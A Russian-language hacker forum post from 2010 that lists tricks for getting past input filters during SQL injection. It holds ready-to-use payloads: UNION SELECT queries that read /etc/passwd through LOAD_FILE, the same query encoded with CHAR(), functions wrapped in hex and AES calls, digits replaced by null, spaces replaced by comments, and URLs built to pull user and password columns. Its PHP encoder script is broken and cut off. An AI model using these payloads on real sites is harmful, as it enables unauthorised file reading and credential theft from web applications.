08.10.2010, 01:00
|
|
Новичок
Регистрация: 04.02.2010
Сообщений: 2
С нами:
8561817
Репутация:
0
|
|
Добавление к статье.(обход фильтрации символов)
1.unhex.Если запрос фильтруеться и не выполняеться, тогд в этом случае можно запрос закодировать...
PHP highlight
Код:
Код:
unhex(hex(например:user())//если сервер фильтрует user() и т.д., тогда его можно зашифровать в hex таким образом.
2.CHAR.
Допустим что у нас есть file_priv, наш запрос выглятит так
PHP highlight
Код:
Код:
union+select+1,2,LOAD_FILE('etc/passwd'),4,5--+
Но вдруг запрос отфильтровало!(((
Тогда пробуем зачарить наш запрос...
пишем вот такой php скрипт:
Спойлер
PHP highlight
Код:
Код:
";
print"";
print"Word:";
print"";
print"n";
}
if (!isset($_GET['string'])){
form();
exit;
}
$string=$_GET['string'];
for ($i=0;$i
и вставить шифрованые запрос в:
PHP highlight
Код:
Код:
union+select+1,2,LOAD_FILE(char(92,39,47,101,116,99,47,112,97,115,115,119,100,92,39),4,5--+
3.AES_DECRYPT.AES_ENCRYPT.Вполне успешно может сработать и такой запрос!
Код:
PHP highlight
Код:
Код:
http://www.site.ru/index.php?page=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(USER(),0x71),0x71),4,5,6/*
4.Еще попадаються случаи когда фильтруються цифры и +(плюс).
цифры можно заменять на null, а + на /**/
пример с цифрами:
PHP highlight
Код:
Код:
http://www.site.ru/index.php?page=-1+union+select+null,null/*
пример с +:
PHP highlight
Код:
Код:
http://www.site.ru/index.php?page=-1/**/union/**/select/**/1,2,user,password,5,6/**
|
|
|